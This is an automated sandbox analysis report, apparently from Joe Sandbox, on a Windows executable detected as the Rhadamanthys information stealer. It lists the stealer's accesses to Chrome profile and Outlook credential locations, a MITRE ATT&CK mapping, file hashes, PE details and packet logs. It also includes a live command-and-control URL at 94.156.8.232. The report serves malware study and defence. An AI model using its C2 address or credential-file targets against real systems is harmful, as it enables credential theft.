                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Source: Yara matchFile source: Process Memory Space: OpenWith.exe PID: 1880, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F04F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,3_2_00007DF41F04F83C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0814B8 socket,bind,3_2_00007DF41F0814B8

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		12
                      Process Injection                      		2
                      Virtualization/Sandbox Evasion                      		1
                      OS Credential Dumping                      		21
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		21
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		12
                      Process Injection                      		21
                      Input Capture                      		2
                      Virtualization/Sandbox Evasion                      		Remote Desktop Protocol21
                      Input Capture                      		4
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Native API                      		Logon Script (Windows)Logon Script (Windows)2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      Process Discovery                      		SMB/Windows Admin Shares1
                      Archive Collected Data                      		2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing                      		NTDS2
                      File and Directory Discovery                      		Distributed Component Object Model2
                      Data from Local System                      		13
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets25
                      System Information Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      wdeeFKntav.exe76%ReversingLabsWin32.Trojan.Rhadamanthys
                      wdeeFKntav.exe100%AviraTR/Dropper.Gen
                      wdeeFKntav.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                      https://discord.com0%Avira URL Cloudsafe
                      https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9kernelbasentdllkernel32GetProcessMitigationPolicyH0%Avira URL Cloudsafe
                      https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw90%Avira URL Cloudsafe
                      https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                      https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9x0%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                      https://discordapp.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ac.ecosia.org/autocomplete?q=OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtabOpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://discord.comOpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoOpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9xOpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchOpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9kernelbasentdllkernel32GetProcessMitigationPolicyHdialer.exe, 00000002.00000002.2241516364.0000000004D2F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://discordapp.comOpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.ecosia.org/newtab/OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      94.156.8.232
                      		unknownBulgaria
                      		43561NET1-ASBGfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446715
                      Start date and time:2024-05-23 20:14:13 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 32s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:7
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:wdeeFKntav.exe
                      renamed because original name is a hash value
                      Original Sample Name:e1bece7ba20dbb8100100f8cff2c415d.exe
                      Detection:MAL
                      Classification:mal96.troj.spyw.evad.winEXE@5/0@0/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target dialer.exe, PID 3544 because there are no executed function
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: wdeeFKntav.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      NET1-ASBGswift_remittance_copy_inv_30_04_2024_0000000000_pdf.exeGet hashmaliciousGuLoaderBrowse
                      • 94.156.79.233
                      f8GLtfhhUE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                      • 93.123.85.150
                      bdt8IuhyZf.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                      • 93.123.85.150
                      KiJB2lBtSJ.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                      • 93.123.85.150
                      BB24c77W9m.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                      • 93.123.85.150
                      BMLdkgNdmq.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                      • 93.123.85.150
                      jeM5pLzbPC.elfGet hashmaliciousMirai, OkiruBrowse
                      • 93.123.85.150
                      pzgCFFap5z.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                      • 93.123.85.150
                      V2ftVl9pny.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 93.123.85.72
                      KJeY9oDz0c.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 93.123.85.72

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      caec7ddf6889590d999d7ca1b76373b6devpas.exeGet hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232
                      Aj4OpKP0Zu.exeGet hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232
                      MoqMg029JT.exeGet hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232
                      decoded-20240415132315.exeGet hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232
                      roland.ps1Get hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232
                      FRS3587.jsGet hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232
                      g.ps1Get hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232
                      NervousGrammar.exeGet hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232
                      app.exeGet hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232
                      DRBS9035.lnkGet hashmaliciousRHADAMANTHYSBrowse
                      • 94.156.8.232

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):4.106612831396304
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      File name:wdeeFKntav.exe
                      File size:447'488 bytes
                      MD5:e1bece7ba20dbb8100100f8cff2c415d
                      SHA1:6ea8efc12ed24f00eb0f230dfec026a6816ba696
                      SHA256:98942a0affa9721c90b097c2c6a9cd02959185526c3b7a44377a25b252a16fff
                      SHA512:77c12a3d7bc5d793971ceb4cd7e5fdab70d7d548e9b3e2ead45a8c283cdb5ff64676d126e5a6255f0cb59d7f9a9a7bc8573a537d6674a52ec36bef871f8f09c0
                      SSDEEP:6144:A2qezd2ab1/RuHk+M3k8M3W7XomjOJCqshrOlumY6DMIewgxQfqksb:Af2R/EEkCQFYDwRqv
                      TLSH:5294238FB69B5424DD3626F3DE6652383B1574580B460EFF9E7B6D20A010FA94E28F03
                      File Content Preview:MZER.....X...P..........@...............................................!..L.!This program cannot be run in DOS mode....$.......]...............v...............v...................,.....................\.............Rich....................PE..L..._{_d...

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x4508ce
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x645F7B5F [Sat May 13 11:58:23 2023 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:be49a2411263045f8ee0c442783b5f83

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      push FFFFFFFFh
                      push 004697B0h
                      push 004510BFh
                      mov eax, dword ptr fs:[00000000h]
                      push eax
                      mov dword ptr fs:[00000000h], esp
                      sub esp, 68h
                      push ebx
                      push esi
                      push edi
                      mov dword ptr [ebp-18h], esp
                      xor ebx, ebx
                      mov dword ptr [ebp-04h], ebx
                      push 00000002h
                      call dword ptr [00462040h]
                      pop ecx
                      or dword ptr [0046A038h], FFFFFFFFh
                      or dword ptr [0046A03Ch], FFFFFFFFh
                      call dword ptr [00462044h]
                      mov ecx, dword ptr [0046A034h]
                      mov dword ptr [eax], ecx
                      call dword ptr [00462048h]
                      mov ecx, dword ptr [0046A030h]
                      mov dword ptr [eax], ecx
                      mov eax, dword ptr [0046204Ch]
                      mov eax, dword ptr [eax]
                      mov dword ptr [0046A040h], eax
                      call 00007F2604E2C8F9h
                      cmp dword ptr [0046A010h], ebx
                      jne 00007F2604E2C7FEh
                      push 00450A3Eh
                      call dword ptr [00462050h]
                      pop ecx
                      call 00007F2604E2C8CBh
                      push 0046A00Ch
                      push 0046A008h
                      call 00007F2604E2CF49h
                      mov eax, dword ptr [0046A02Ch]
                      mov dword ptr [ebp-6Ch], eax
                      lea eax, dword ptr [ebp-6Ch]
                      push eax
                      push dword ptr [0046A028h]
                      lea eax, dword ptr [ebp-64h]
                      push eax
                      lea eax, dword ptr [ebp-70h]
                      push eax
                      lea eax, dword ptr [ebp-60h]
                      push eax
                      call dword ptr [00462058h]
                      push 0046A004h
                      push 0046A000h
                      call 00007F2604E2CF16h

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x699380x78.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6b0000x3e8.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000xec.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x697bc0x1c.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x620000xe0.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x510000x51000ce5d35bb2100e8425f450f8f9c1f8418False0.6782949942129629data4.954458598025482IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .textbss0x520000x100000x10000fcd6bcb56c1689fcef28b57c22475badFalse0.00128173828125data0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rdata0x620000x80000x8000d6b29c16f6146192ceb1cc04fa266d03False0.459747314453125data3.238453646632478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x6a0000x10000x10008c2673de782b958cc8212ba03a82b487False0.00732421875data0.0032818649698048933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x6b0000x10000x10007d17d27c213736b27864e31fa8c494e0False0.113525390625data1.0434780483617156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x6c0000x10000x1000fdb8c3dd30273b05b0616083a8224857False0.066162109375data0.6070110974433348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_VERSION0x6b0600x384dataEnglishUnited States0.45555555555555555

                      Imports

                      DLLImport
                      KERNEL32.dllHeapAlloc, HeapFree, GetProcessHeap, WaitForSingleObject, HeapDestroy, MulDiv, lstrlenW, CreateEventA, GetModuleFileNameW, GetModuleHandleA, CloseHandle, HeapCreate, GetStartupInfoA
                      USER32.dllAdjustWindowRect, GetDlgItem, GetIconInfo, SendDlgItemMessageA, InflateRect, DialogBoxParamA, CreateIconFromResourceEx, SendMessageW, LookupIconIdFromDirectoryEx, LoadImageA, SetForegroundWindow, EndDialog, OffsetRect, GetWindowLongA, SetWindowPos, UnionRect, SetWindowTextW
                      GDI32.dllGetObjectA
                      ole32.dllCoCreateGuid, CoTaskMemFree, CoInitializeEx
                      MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, memset, memcpy, wcsrchr, wcschr, _controlfp, _except_handler3

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 23, 2024 20:15:07.005363941 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:07.005454063 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:07.005702972 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:07.005702972 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:07.005832911 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.035953999 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.036145926 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.046547890 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.046595097 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.046997070 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.054514885 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.102498055 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.292695999 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.297682047 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.297769070 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.297808886 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.297874928 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.315721035 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.315805912 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.412381887 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.412611961 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.422642946 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.422796965 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.435369015 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.435390949 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.435482025 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.435499907 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.489074945 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.570081949 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.570122957 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.570197105 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.570239067 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.570250034 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.580193996 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.580236912 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.580272913 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.580285072 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.580332994 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.629714012 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.636876106 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.636914968 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.636931896 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.636981010 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.637018919 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.637079954 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.637094975 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.653129101 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.653162003 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.653207064 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.653211117 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.653244019 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.653263092 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.653295040 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.749608994 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.749646902 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.749696970 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.749874115 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.749874115 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:08.749913931 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:08.763262987 CEST4434969994.156.8.232192.168.2.6
